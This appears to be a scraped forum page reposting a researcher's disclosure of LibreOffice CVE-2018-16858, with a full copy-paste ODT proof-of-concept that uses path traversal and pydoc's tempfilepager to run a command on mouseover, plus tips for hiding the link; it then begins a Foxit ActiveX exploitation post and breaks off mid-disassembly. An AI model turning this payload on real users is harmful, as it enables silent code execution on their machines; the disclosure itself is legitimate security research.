https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/
-
Friday, February 1, 2019 Libreoffice (CVE-2018-16858) - Remote Code Execution via Macro/Event execution I started to have a look at Libreoffice and discovered a way to achieve remote code execution as soon as a user opens a malicious ODT file and moves his mouse over the document, without triggering any warning dialog. This blogpost will describe the vulnerability I discovered. It must be noted the vulnerability will be discussed in the context of Windows but Linux can be exploited the same way. Tested LibreOffice version: 6.1.2.1 (6.0.x does not allow to pass parameters) Tested Operating Systems: Windows + Linux (both affected) The feature I started to read the OpenDocument-v1.2-part1 specification to get a feeling for the file format. Additionally I created some odt files (which, similar to docx, are zip files containing files describing the file structure) so I can follow the file format specification properly. The specification for the office:scripts element peeked my interested so I started to investigate how this element is used. I stumbled upon the scripting framework documentation (which specifies that Basic, BeanShell, Java JavaScript and Python is supported). Additionally I discovered how to create an ODT file via the GUI, which uses the office:script element (thanks google). Open Libreoffice writer => Insert => Hyperlink and click on the gear wheel icon (open the image so you can properly read it): I choosed to use the onmouseover event and the python sample installed with LibreOffice. After assigning this script (or event as it is called in the LibreOffice world) and saving this file, I was able to have a look at the created file structure: <script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&location=share" xlink:type="simple"/> This looked like it is loading a file from the local file system and that assumption is true (the path shown is for Windows but it is present for Linux as well): C:\Program Files\LibreOffice\share\Scripts\python\pythonSamples\TableSample.py The file contains a createTable function. So I opened the created ODT file and moved the mouse over the link and to my surprise the python file was executed without any warning dialog. Important side note: LibreOffice ships with its own python interpreter, so there is no need that python is actually installed The Bug Given that a local python file is executed, the first thing I tried was path traversal. After unzipping I modified the script:event-listener element like this: <script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../../../../../../../TableSample.py$createTable?language=Python&location=share" xlink:type="simple"/> I zipped everything up, changed the extension to ODT and started ProcessMonitor. I configured it to only list libreoffice related events and opened the ODT file in LibreOffice. As soon as I moved my mouse over the hyperlink and therefore executing the event, I saw that the path traversal worked as a FILE NOT FOUND event was shown in ProcessMonitor! To be sure that the feature still works with path traversal, I copy&pasted the original TableSample.py in the C:\ root directory and opened the ODT file again. Thankfully the python file was executed from C:\ as soon as the event was triggered. Lastly I changed the content of TableSample.py in the C:\ folder so it would create a file in case it is executed. I used the same ODT file again to execute the python file and the file was successfully dropped. That meant I was able to execute any python file from the local file system, without a warning dialog as soon as the mouse is over the hyperlink in the document. Exploitation To properly exploit this behavior, we need to find a way to load a python file we have control over and know its location. At first I was investigating the location parameter of the vnd.sun.star.script protocol handler: "LOCPARAM identifies the container of the script, i.e. My Macros, or OpenOffice.org Macros, or within the current document, or in an extension." If we can specify a python script in the current document, we should have no problem loading a custom python script. This idea was a dead end really quick as by specifying location=document a dialog is shown- explaining that macros hosted inside the document are currently disabled. The next idea was abusing the location=user parameter. In case of Windows the user location points inside the AppData directory of the current user. The idea was to abuse the path traversal to traverse down into the users Download directory and load the ODT file as a python script (ergo creating a polyglot file, which is a python file + a working ODT file). Sadly this was a dead end as well as LibreOffice does not like any data before the ODT Zip header. The solution For the solution I looked into the python parsing code a little more in depth and discovered that it is not only possible to specify the function you want to call inside a python script, but it is possible to pass parameters as well (this feature seems to be introduced in the 6.1.x branch): <script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../../../../../../../TableSample.py$functionName(param1,param2)?language=Python&location=share" xlink:type="simple"/> As LibreOffice ships with its own python interpreter and therefore a bunch of python scripts, I started to examine them for potential insecure functions I can abuse. After some digging I discovered the following code: File: C:\Program Files\LibreOffice\program\python-core-3.5.5\lib\pydoc.py Code: def tempfilepager(text, cmd): """Page through text by invoking a program on a temporary file.""" import tempfile filename = tempfile.mktemp() with open(filename, 'w', errors='backslashreplace') as file: file.write(text) try: os.system(cmd + ' "' + filename + '"') finally: os.unlink(filename) The user controlled cmd parameter is passed to the os.system call, which just passes the string to a subshell (cmd.exe on Window) and therefore allowing to execute a local file with parameters: <script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&location=share" xlink:type="simple"/> Some notes regarding the Proof-of-Concept Video. I changed the color of the Hyperlink to white so it can't be seen. Additionally the link covers the whole page, therefore increasing the chance a user moves his mouse over the link and executing my payload: Reporting the bug Reporting the bug was kind of a wild ride. At first I reported it via the libreoffice bugzilla system. Apparently for security issues it is better to send an email to officesecurity@lists.freedesktop.org, but I did not know that. So my bugzilla report got closed but I convinced them to have another look. The bug was picked up and moved to a thread via officesecurity@lists.freedesktop.org. The issue was verified and fixed quite fast. Timeline: 18.10.2018 - reported the bug 30.10.2018 - bug was fixed and added to daily builds 14.11.2018 - CVE-2018-16858 was assigned by Redhat - got told that 31.01.2019 is the date I can publish 01.02.2019 - Blogpost published The path traversal is fixed in (I just tested these versions): Libreoffice: 6.1.4.2 Libreoffice: 6.0.7 Vulnerable: Openoffice: 4.1.6 (latest version) I reconfirmed via email that I am allowed to publish the details of the vulnerability although openoffice is still unpatched. Openoffice does not allow to pass parameters therefore my PoC does not work but the path traversal can be abused to execute a python script from another location on the local file system. To disable the support for python the pythonscript.py in the installation folder can be either removed or renamed (example on linux /opt/openoffice4/program/pythonscript.py) Additional note As I had some additional time until I could publish this blogpost I thought about ImageMagick, as it is using LibreOffice (soffice) to convert certain file types. It is possible to use certain events to trigger the execution of a script as shown above but one additional parameter will be passed, which you have no control of. Therefore my PoC does not work but in case you are able to reference your own local python file, it is possible to abuse it via ImageMagick as well (given that 6.1.2.1 or another vulnerability version is installed) Proof-of-concept - Copy&Paste and save it with an .fodt extension! Openoffice does not support FODT files, so it is necessary to open it with Libreoffice and save it as an ODT file. <?xml version="1.0" encoding="UTF-8"?> <office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text"> <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta> <office:settings> <config:config-item-set config:name="ooo:view-settings"> <config:config-item config:name="ViewAreaTop" config:type="long">0</config:config-item> <config:config-item config:name="ViewAreaLeft" config:type="long">0</config:config-item> <config:config-item config:name="ViewAreaWidth" config:type="long">35959</config:config-item> <config:config-item config:name="ViewAreaHeight" config:type="long">12913</config:config-item> <config:config-item config:name="ShowRedlineChanges" config:type="boolean">true</config:config-item> <config:config-item config:name="InBrowseMode" config:type="boolean">false</config:config-item> <config:config-item-map-indexed config:name="Views"> <config:config-item-map-entry> <config:config-item config:name="ViewId" config:type="string">view2</config:config-item> <config:config-item config:name="ViewLeft" config:type="long">9772</config:config-item> <config:config-item config:name="ViewTop" config:type="long">2501</config:config-item> <config:config-item config:name="VisibleLeft" config:type="long">0</config:config-item> <config:config-item config:name="VisibleTop" config:type="long">0</config:config-item> <config:config-item config:name="VisibleRight" config:type="long">35957</config:config-item> <config:config-item config:name="VisibleBottom" config:type="long">12912</config:config-item> <config:config-item config:name="ZoomType" config:type="short">0</config:config-item> <config:config-item config:name="ViewLayoutColumns" config:type="short">1</config:config-item> <config:config-item config:name="ViewLayoutBookMode" config:type="boolean">false</config:config-item> <config:config-item config:name="ZoomFactor" config:type="short">100</config:config-item> <config:config-item config:name="IsSelectedFrame" config:type="boolean">false</config:config-item> <config:config-item config:name="AnchoredTextOverflowLegacy" config:type="boolean">false</config:config-item> </config:config-item-map-entry> </config:config-item-map-indexed> </config:config-item-set> <config:config-item-set config:name="ooo:configuration-settings"> <config:config-item config:name="ProtectForm" config:type="boolean">false</config:config-item> <config:config-item config:name="PrinterName" config:type="string"/> <config:config-item config:name="EmbeddedDatabaseName" config:type="string"/> <config:config-item config:name="CurrentDatabaseDataSource" config:type="string"/> <config:config-item config:name="LinkUpdateMode" config:type="short">1</config:config-item> <config:config-item config:name="AddParaTableSpacingAtStart" config:type="boolean">true</config:config-item> <config:config-item config:name="FloattableNomargins" config:type="boolean">false</config:config-item> <config:config-item config:name="UnbreakableNumberings" config:type="boolean">false</config:config-item> <config:config-item config:name="FieldAutoUpdate" config:type="boolean">true</config:config-item> <config:config-item config:name="AddVerticalFrameOffsets" config:type="boolean">false</config:config-item> <config:config-item config:name="BackgroundParaOverDrawings" config:type="boolean">false</config:config-item> <config:config-item config:name="AddParaTableSpacing" config:type="boolean">true</config:config-item> <config:config-item config:name="ChartAutoUpdate" config:type="boolean">true</config:config-item> <config:config-item config:name="CurrentDatabaseCommand" config:type="string"/> <config:config-item config:name="AlignTabStopPosition" config:type="boolean">true</config:config-item> <config:config-item config:name="PrinterSetup" config:type="base64Binary"/> <config:config-item config:name="PrinterPaperFromSetup" config:type="boolean">false</config:config-item> <config:config-item config:name="IsKernAsianPunctuation" config:type="boolean">false</config:config-item> <config:config-item config:name="CharacterCompressionType" config:type="short">0</config:config-item> <config:config-item config:name="ApplyUserData" config:type="boolean">true</config:config-item> <config:config-item config:name="SaveGlobalDocumentLinks" config:type="boolean">false</config:config-item> <config:config-item config:name="SmallCapsPercentage66" config:type="boolean">false</config:config-item> <config:config-item config:name="CurrentDatabaseCommandType" config:type="int">0</config:config-item> <config:config-item config:name="SaveVersionOnClose" config:type="boolean">false</config:config-item> <config:config-item config:name="UpdateFromTemplate" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintSingleJobs" config:type="boolean">false</config:config-item> <config:config-item config:name="PrinterIndependentLayout" config:type="string">high-resolution</config:config-item> <config:config-item config:name="EmbedSystemFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotCaptureDrawObjsOnPage" config:type="boolean">false</config:config-item> <config:config-item config:name="UseFormerObjectPositioning" config:type="boolean">false</config:config-item> <config:config-item config:name="IsLabelDocument" config:type="boolean">false</config:config-item> <config:config-item config:name="AddFrameOffsets" config:type="boolean">false</config:config-item> <config:config-item config:name="AddExternalLeading" config:type="boolean">true</config:config-item> <config:config-item config:name="UseOldNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="OutlineLevelYieldsNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotResetParaAttrsForNumFont" config:type="boolean">false</config:config-item> <config:config-item config:name="IgnoreFirstLineIndentInNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="AllowPrintJobCancel" config:type="boolean">true</config:config-item> <config:config-item config:name="UseFormerLineSpacing" config:type="boolean">false</config:config-item> <config:config-item config:name="AddParaSpacingToTableCells" config:type="boolean">true</config:config-item> <config:config-item config:name="UseFormerTextWrapping" config:type="boolean">false</config:config-item> <config:config-item config:name="RedlineProtectionKey" config:type="base64Binary"/> <config:config-item config:name="ConsiderTextWrapOnObjPos" config:type="boolean">false</config:config-item> <config:config-item config:name="DoNotJustifyLinesWithManualBreak" config:type="boolean">false</config:config-item> <config:config-item config:name="EmbedFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="TableRowKeep" config:type="boolean">false</config:config-item> <config:config-item config:name="TabsRelativeToIndent" config:type="boolean">true</config:config-item> <config:config-item config:name="IgnoreTabsAndBlanksForLineCalculation" config:type="boolean">false</config:config-item> <config:config-item config:name="RsidRoot" config:type="int">1115298</config:config-item> <config:config-item config:name="LoadReadonly" config:type="boolean">false</config:config-item> <config:config-item config:name="ClipAsCharacterAnchoredWriterFlyFrames" config:type="boolean">false</config:config-item> <config:config-item config:name="UnxForceZeroExtLeading" config:type="boolean">false</config:config-item> <config:config-item config:name="UseOldPrinterMetrics" config:type="boolean">false</config:config-item> <config:config-item config:name="TabAtLeftIndentForParagraphsInList" config:type="boolean">false</config:config-item> <config:config-item config:name="Rsid" config:type="int">1115298</config:config-item> <config:config-item config:name="MsWordCompTrailingBlanks" config:type="boolean">false</config:config-item> <config:config-item config:name="MathBaselineAlignment" config:type="boolean">true</config:config-item> <config:config-item config:name="InvertBorderSpacing" config:type="boolean">false</config:config-item> <config:config-item config:name="CollapseEmptyCellPara" config:type="boolean">true</config:config-item> <config:config-item config:name="TabOverflow" config:type="boolean">true</config:config-item> <config:config-item config:name="StylesNoDefault" config:type="boolean">false</config:config-item> <config:config-item config:name="ClippedPictures" config:type="boolean">false</config:config-item> <config:config-item config:name="TabOverMargin" config:type="boolean">false</config:config-item> <config:config-item config:name="TreatSingleColumnBreakAsPageBreak" config:type="boolean">false</config:config-item> <config:config-item config:name="SurroundTextWrapSmall" config:type="boolean">false</config:config-item> <config:config-item config:name="ApplyParagraphMarkFormatToNumbering" config:type="boolean">false</config:config-item> <config:config-item config:name="PropLineSpacingShrinksFirstLine" config:type="boolean">true</config:config-item> <config:config-item config:name="SubtractFlysAnchoredAtFlys" config:type="boolean">false</config:config-item> <config:config-item config:name="DisableOffPagePositioning" config:type="boolean">false</config:config-item> <config:config-item config:name="EmptyDbFieldHidesPara" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintAnnotationMode" config:type="short">0</config:config-item> <config:config-item config:name="PrintGraphics" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintBlackFonts" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintProspect" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintLeftPages" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintControls" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintPageBackground" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintTextPlaceholder" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintDrawings" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintHiddenText" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintTables" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintProspectRTL" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintReversed" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintRightPages" config:type="boolean">true</config:config-item> <config:config-item config:name="PrintFaxName" config:type="string"/> <config:config-item config:name="PrintPaperFromSetup" config:type="boolean">false</config:config-item> <config:config-item config:name="PrintEmptyPages" config:type="boolean">false</config:config-item> </config:config-item-set> </office:settings> <office:scripts> <office:script script:language="ooo:Basic"> <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink"> <ooo:library-embedded ooo:name="Standard"/> </ooo:libraries> </office:script> </office:scripts> <office:font-face-decls> <style:font-face style:name="Arial1" svg:font-family="Arial" style:font-family-generic="swiss"/> <style:font-face style:name="Liberation Serif" svg:font-family="'Liberation Serif'" style:font-family-generic="roman" style:font-pitch="variable"/> <style:font-face style:name="Liberation Sans" svg:font-family="'Liberation Sans'" style:font-family-generic="swiss" style:font-pitch="variable"/> <style:font-face style:name="Arial" svg:font-family="Arial" style:font-family-generic="system" style:font-pitch="variable"/> <style:font-face style:name="Microsoft YaHei" svg:font-family="'Microsoft YaHei'" style:font-family-generic="system" style:font-pitch="variable"/> <style:font-face style:name="NSimSun" svg:font-family="NSimSun" style:font-family-generic="system" style:font-pitch="variable"/> </office:font-face-decls> <office:styles> <style:default-style style:family="graphic"> <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/> <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false"> <style:tab-stops/> </style:paragraph-properties> <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN"/> </style:default-style> <style:default-style style:family="paragraph"> <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/> <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="12pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="10.5pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="12pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/> </style:default-style> <style:default-style style:family="table"> <style:table-properties table:border-model="collapsing"/> </style:default-style> <style:default-style style:family="table-row"> <style:table-row-properties fo:keep-together="auto"/> </style:default-style> <style:style style:name="Standard" style:family="paragraph" style:class="text"/> <style:style style:name="Heading" style:family="paragraph" style:parent-style-name="Standard" style:next-style-name="Text_20_body" style:class="text"> <style:paragraph-properties fo:margin-top="0.1665in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" fo:keep-with-next="always"/> <style:text-properties style:font-name="Liberation Sans" fo:font-family="'Liberation Sans'" style:font-family-generic="swiss" style:font-pitch="variable" fo:font-size="14pt" style:font-name-asian="Microsoft YaHei" style:font-family-asian="'Microsoft YaHei'" style:font-family-generic-asian="system" style:font-pitch-asian="variable" style:font-size-asian="14pt" style:font-name-complex="Arial" style:font-family-complex="Arial" style:font-family-generic-complex="system" style:font-pitch-complex="variable" style:font-size-complex="14pt"/> </style:style> <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text"> <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/> </style:style> <style:style style:name="List" style:family="paragraph" style:parent-style-name="Text_20_body" style:class="list"> <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/> </style:style> <style:style style:name="Caption" style:family="paragraph" style:parent-style-name="Standard" style:class="extra"> <style:paragraph-properties fo:margin-top="0.0835in" fo:margin-bottom="0.0835in" loext:contextual-spacing="false" text:number-lines="false" text:line-number="0"/> <style:text-properties fo:font-size="12pt" fo:font-style="italic" style:font-size-asian="12pt" style:font-style-asian="italic" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss" style:font-size-complex="12pt" style:font-style-complex="italic"/> </style:style> <style:style style:name="Index" style:family="paragraph" style:parent-style-name="Standard" style:class="index"> <style:paragraph-properties text:number-lines="false" text:line-number="0"/> <style:text-properties style:font-size-asian="12pt" style:font-name-complex="Arial1" style:font-family-complex="Arial" style:font-family-generic-complex="swiss"/> </style:style> <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text"> <style:text-properties fo:color="#000080" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/> </style:style> <text:outline-style style:name="Outline"> <text:outline-level-style text:level="1" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="2" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="3" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="4" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="5" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="6" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="7" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="8" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="9" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> <text:outline-level-style text:level="10" style:num-format=""> <style:list-level-properties text:list-level-position-and-space-mode="label-alignment"> <style:list-level-label-alignment text:label-followed-by="listtab"/> </style:list-level-properties> </text:outline-level-style> </text:outline-style> <text:notes-configuration text:note-class="footnote" style:num-format="1" text:start-value="0" text:footnotes-position="page" text:start-numbering-at="document"/> <text:notes-configuration text:note-class="endnote" style:num-format="i" text:start-value="0"/> <text:linenumbering-configuration text:number-lines="false" text:offset="0.1965in" style:num-format="1" text:number-position="left" text:increment="5"/> </office:styles> <office:automatic-styles> <style:style style:name="T1" style:family="text"> <style:text-properties officeooo:rsid="001104a2"/> </style:style> <style:page-layout style:name="pm1"> <style:page-layout-properties fo:page-width="8.5in" fo:page-height="11in" style:num-format="1" style:print-orientation="portrait" fo:margin-top="0.7874in" fo:margin-bottom="0.7874in" fo:margin-left="0.7874in" fo:margin-right="0.7874in" style:writing-mode="lr-tb" style:footnote-max-height="0in"> <style:footnote-sep style:width="0.0071in" style:distance-before-sep="0.0398in" style:distance-after-sep="0.0398in" style:line-style="solid" style:adjustment="left" style:rel-width="25%" style:color="#000000"/> </style:page-layout-properties> <style:header-style/> <style:footer-style/> </style:page-layout> </office:automatic-styles> <office:master-styles> <style:master-page style:name="Standard" style:page-layout-name="pm1"/> </office:master-styles> <office:body> <office:text> <text:sequence-decls> <text:sequence-decl text:display-outline-level="0" text:name="Illustration"/> <text:sequence-decl text:display-outline-level="0" text:name="Table"/> <text:sequence-decl text:display-outline-level="0" text:name="Text"/> <text:sequence-decl text:display-outline-level="0" text:name="Drawing"/> <text:sequence-decl text:display-outline-level="0" text:name="Figure"/> </text:sequence-decls> <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://test/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, calc.exe )?language=Python&location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1">move your mouse over the text</text:span></text:a></text:p> </office:text> </office:body> </office:document> Eingestellt von Alex Inführ Sursa: https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html
-
- 1
-
-
ActiveX Exploitation in 2019 :: Instantiation is not Scripting Feb 1, 2019 But didn’t Microsoft kill ActiveX? I hear you asking. Well they almost did. As most security practitioners know, ActiveX has had a long history of exploitation and its fair share of remote vulnerabilities. Microsoft themselves have had several ActiveX vulnerabilities disclosed along with many popular third party vendors. Microsoft released an update where they have essentially killed any scripting for ActiveX objects from a remote context. However, they did leave the ability for ActiveX controls to be instantiated. In some cases, this can still allow for remote code execution from parsing vulnerabilities. I believe was done for backwards compatibility reasons, for example, situations such as the Microsoft Management Console (MMC) which requires trusted ActiveX controls to be instantiated for system management. TL;DR In this post, I discuss the mitigations surrounding ActiveX and how they don’t prevent all attacks. Then I discuss the discovery and exploitation of CVE-2018-19418 and just the discovery of CVE-2018-19447 which are client-side vulnerabilities that allows for remote code execution. The only interaction that is required is that the victim opens a malicious office document. Introduction The Foxit website explains what Foxit Reader SDK ActiveX is, quickly summing it up as: PDF SDK ActiveX is ideal for product managers and developers who want an easy to use and a customizable visual component that they can simply drag and drop into their application to quickly create a PDF Viewing application without requiring any PDF expertise. There are two versions, the Standard and Professional versions. They differ in that the professional version allows you to run arbitrary JavaScript and has access to much more PDF features. These products are not to be confused with Foxit Reader’s own ActiveX control, which ships with its main product, Foxit Reader. Its own ActiveX control located at C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderBrowserAx.dll will proxy off the parsing of a PDF to its regular binary, C:\Program Files\Foxit Software\Foxit Reader\FoxitReader.exe. So if there are any parsing vulnerabilities in this code, it can be reached via the DLL as well. Adobe do a similar thing, the only difference being is that it is ran in a sandbox. The other noticeable difference is that Adobe don’t have standalone ActiveX products which avoids the need for two different parsers. This avoids situations where a bug maybe patched in their core product, yet missed in other PDF parsers that they offer. The Target The targets I tested were FoxitPDFSDKActiveX540_Std.msi (eba1a06230cc1a39ccb1fb7f04448a0d78859b60) and FoxitPDFSDKActiveX540_Pro.msi (243a9099c9788dfcf38817f20208e5289b530f56) which were the latest at the time. However, before auditing the control, we need to make sure that we can even instantiate it without any popups or issues. As it turns out, both controls are Safe for Initialization and do not have the kill bit set. Loaded File: C:\Program Files\Foxit Software\Foxit PDF SDK ActiveX Std\bin\FoxitPDFSDK_AX_Std.ocx Name: FoxitPDFSDKStdLib Lib GUID: {5FE9D64A-3BC2-43CB-AA47-F0B0C510EBEA} Version: 5.0 Lib Classes: 7 Class FoxitPDFSDK GUID: {0F6C092B-6E4C-4976-B386-27A9FD9E96A1} Number of Interfaces: 1 Default Interface: _DFoxitPDFSDK RegKey Safe for Script: True RegKey Safe for Init: True KillBitSet: False So even though the settings allow us to script it, Microsoft prevents us from doing so with the latest updates (I’m not sure exactly when this was introduced). That’s good, because I audited several of the methods such as OpenFileAsync and found many trivially exploitable stack buffer overflows. I didn’t report them since there doesn’t exist a remote vector anymore. Initially I wanted a vulnerability that would affect both the standard and professional versions. Since both products share code, it wasn’t too hard to find what I was looking for. However, as mentioned previously, the standard version does not allow JavaScript. If I went after a memory corruption bug, then I may have a harder time for exploitation since I can’t script anything. The Vulnerabilities CVE-2018-19418 - Launch Action New Window Command Injection Since this was an untouched PDF parser that is remotely accessible I decided to go after simple things like logic vulnerabilities. The first thing I decided to do was cross reference all calls to CreateProcessW. As it turns out there was a few actually. But the most interesting was the one sub_1049FD60 at loc_104A0E80: .text:10481D95 loc_10481D95: ; CODE XREF: sub_10481D10+81 .text:10481D95 lea ecx, [ebp+ProcessInformation] .text:10481D98 push ecx ; lpProcessInformation .text:10481D99 lea edx, [ebp+StartupInfo] .text:10481D9C push edx ; lpStartupInfo .text:10481D9D push 0 ; lpCurrentDirectory .text:10481D9F push 0 ; lpEnvironment .text:10481DA1 push 0 ; dwCreationFlags .text:10481DA3 push 0 ; bInheritHandles .text:10481DA5 push 0 ; lpThreadAttributes .text:10481DA7 push 0 ; lpProcessAttributes .text:10481DA9 